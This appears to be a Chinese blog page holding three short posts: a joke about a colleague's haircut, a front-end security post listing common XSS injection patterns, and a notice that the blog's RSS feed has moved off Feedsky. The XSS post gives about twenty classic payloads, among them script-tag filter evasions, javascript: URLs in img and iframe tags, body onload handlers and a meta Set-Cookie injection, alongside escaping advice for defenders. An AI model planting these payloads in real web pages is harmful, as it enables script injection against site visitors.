《淘！人像》系列版权归 宗羲 爷所有，小弟在这里标题党下。

镇南王 周末搓麻打夫妻牌被输得一气之下第二天改了个发型，在这里纪念下。PS，王爷后面的是 小虎，在这里免费给他提供 友情连接 。

王爷是前端组里面唯一一个用苹果机开发的「烧包人士」，媳妇看他不顺眼每天 缠着想着念着要个 403 。

咳咳，当男人定要如王爷一样潇洒！

前端开发常见的安全问题就是会遭受 XSS 注入攻击 ，这里列举常见的代码注入方式。

Javascript 代码注入

Javascript 代码注入主要表现为直接引用未经校验的字符串、解析不安全的 JSON 数据（ 包括 JSONP ）等。

很多时候会写这样的代码

document.write('u name is' + name);

这就会形成一定的安全性问题（如果服务器端没有过滤的话），比如 name 为下面的数据，在没有经过过滤时

';alert('xss');//

";alert('xss');//

'';!--"<xss>=&{()}

就会破坏原有代码结构，插入不期望的代码。

HTML 标签注入

HTML 注入是较为常见的一种方式，主要的注入入口为不周全的正则过滤、内联样式（针对 Exploer），下面是常见的注入代码

逃过不周全的正则过滤，解决方案为使用 PHP 的 htmlspecialchars 以及 htmlentities 等类似函数转义。

<sCrIpT src=xss.js></sCrIpT>

<script src=xss.js>
</script>

<script/xss src="xss.js"></script>

<script/SRC="xss.js"></script>

<<script>alert("xss");//<</script>

<script>a=/xss/
alert(a.source)</script>

从图片标签中注入，在些论坛上比较常见

<img src="javascript:alert('xss');">

<img """><script>alert("xss")</script>">

<img src="xss.php?param">

从连接标签上注入（虽然本人没有发现过案例，不过也不能轻视）

<script a=">" SRC="xss.js"></script>

<script =">" SRC="xss.js"></script>

<script a=">" '' SRC="xss.js"></script>

其他容易注入的地方

<body onload=alert('xss')>

<iframe src="javascript:alert('xss');"></iframe>

<embed src="xss.swf" AllowScriptAccess="always"></embed>

<meta http-equiv="Set-Cookie" content="USERID=<script>alert('xss')</script>">

先摘记举例那么多，下期的内容包括「CSS 注入」、「其他注入方法」以及一般性解决方案，欢迎探讨和纠正。

思绪了良久，我决定放弃使用 Feedsky 服务，下面是我的几点考虑

1. 我很在意 RSS 烧制服务的稳定性，而 Feedsky 的稳定性让我感到不安
2. Feedsky 的订阅数起伏不定，有时真的很浪费我的感情
3. 《拼搏到底》上面 没有我 Blog 的名字
4. Feedsky 的话题广告是种诱惑，让我「违心」写些和本 Blog 无关的内容
5. 我在 Feedsky 的上 90 大洋拿不出来（谁拿的出来，我请客喝奶茶）
6. 听闻 Feedsky 懒已经不是第一次了 ，而我本人不懒
7. 接上面一点，我已经很久没有看见 Feedsky 在产品上有创新了
8. Google 的东西值得信赖
9. 反正我绑定了域名，控制权在我这
10. 将翻墙的事情交给阅读器即可
11. 还有就是 吕欣欣 真的该减肥了 :^)

Feedsky 的 RSS 烧制服务在国内非常的出色，但可惜的是由于自身和外界的种种因素，让我失去了使用他的理由。总之，上述观点非常的个人，请不要反驳我。

-- Split --

说正经的，本 Blog 的 RSS 地址已经改为

http://feeds.gracecode.com/gracecode/ 301 重定向到 该地址 。

如您能看见这篇 Blog，那就说明我 RSS 迁移成功了。